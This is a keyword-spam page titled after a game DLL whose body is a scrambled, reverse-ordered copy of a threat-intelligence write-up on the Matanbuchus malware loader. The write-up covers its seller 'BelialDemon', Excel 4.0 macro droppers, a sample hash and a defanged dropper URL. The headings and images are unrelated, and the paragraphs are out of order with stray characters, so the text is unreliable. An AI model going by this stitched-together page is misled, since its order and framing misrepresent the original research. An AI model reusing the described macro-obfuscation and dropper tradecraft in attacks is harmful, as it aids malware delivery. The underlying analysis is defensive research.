![darkstar one iphlpapi dll darkstar one iphlpapi dll](https://i.ytimg.com/vi/RBOMUr_TItI/maxresdefault.jpg)
- DARKSTAR ONE IPHLPAPI DLL SOFTWARE
- DARKSTAR ONE IPHLPAPI DLL CODE
- DARKSTAR ONE IPHLPAPI DLL DOWNLOAD
Taking these at face value, we can see a breakdown in functionality for downloading a file to a certain location and the execution of it.
DARKSTAR ONE IPHLPAPI DLL DOWNLOAD
These types of actions are chained together, and in this document, perform a simple download and execution of said file.īy removing the blank cells in the document and reviewing the resulting strings, there are many interesting standouts that align with the observed behavior of this file in our WildFire malware analysis engine. This GOTO function tells Excel to select a specific cell hundreds of columns over and 1,595 rows down. In the example above, note how some of the visible cells in the B column refer to columns and rows across the sheet. The cells with data will spread across a sea of blank ones which, when executed, will piece together the information. This is colloquially referred to as Excel 4.0 Macros.
DARKSTAR ONE IPHLPAPI DLL CODE
This shift is because, using Excel's built-in functions, it is possible to store code distributed throughout the spreadsheet cells, offering a native obfuscation that hampers analysis and detection. Specifically, there has been a shift from Microsoft Word to Microsoft Excel when trying to launch malicious payloads on victims’ systems. This file is using a technique more recently favored in attacks leveraging Microsoft Office documents. When opening the Excel document, you're met with the notification that you need to enable macros to view the actual content of the document. The question then becomes what does it actually look like in the wild? The Excel DropperĪfter identifying the Microsoft Excel document ( SHA256: 41727fc99b9d99abd7183f6eec9052f86de076c04056e224ac366762c361afda) as an initial vector of an attack that drops the Matanbuchus Loader DLL, we begin our analysis on this file. Strings showing MatanbuchusDroper.dll.Īs stated by the malware author, the loader has the following features: Looking at some of the included strings showed we were on the right track. Hunting for a sample of Matanbuchus unearthed a file in the wild called ddg.dll, which is actively being dropped via hxxp://idea-secure-logincom.
![darkstar one iphlpapi dll darkstar one iphlpapi dll](https://www.gamingnexus.com/Images/Article/1133/10.jpg)
Since we have a name for the malware direct from the source, we subsequently went hunting for samples of Matanbuchus used in the wild.
![darkstar one iphlpapi dll darkstar one iphlpapi dll](https://i.ytimg.com/vi/HSccQBxSmbg/hqdefault.jpg)
BelialDemon was specifically looking to recruit three people as part of their MaaS offering, charging an initial rental price of $2,500. Looking over posts such as these in Figure 1, we’ll attempt to locate the files through a litany of means to better understand the functionality of the malware and analyze its activity in the wild – allowing for better protections and enriched intelligence. Forum posting of BelialDemon showcasing a loader. BelialDemon is considered the primary developer of TriumphLoader, a loader previously posted about on several forums, and has experience with selling this type of malware. If we look historically, BelialDemon has been involved in the development of malware loaders. This blog sheds light on Matanbuchus, BelialDemon and the malware’s infrastructure. We discovered several organizations impacted by Matanbuchus including a large university and high school in the United States, as well as a high-tech organization in Belgium.Īfter observing the user BelialDemon operating in well-established underground forums, we’ve noticed they stick to a particular biblical theme: their name, Belial, along with the name of their new loader, Matanbuchus, stem from the Ascension of Isaiah 2:4: "And Manasseh turned aside his heart to serve Belial for the angel of lawlessness, who is the ruler of this world, is Belial, whose name is Matanbuchus.” A fitting theme for their operations.
DARKSTAR ONE IPHLPAPI DLL SOFTWARE
Malware loaders are malicious software that typically drop or pull down second-stage malware from command and control (C2) infrastructures. In February 2021, BelialDemon advertised a new malware-as-a-service (MaaS) called Matanbuchus Loader and charged an initial rental price of $2,500. One such case that we investigated involves a threat actor called BelialDemon, who is a member of several underground forums and marketplaces. Non-traditional sources often include underground marketplaces and sites, spanning from forums on the Tor network to Telegram channels and other marketplaces. Unit 42 researchers often spend time investigating what we call non-traditional sources.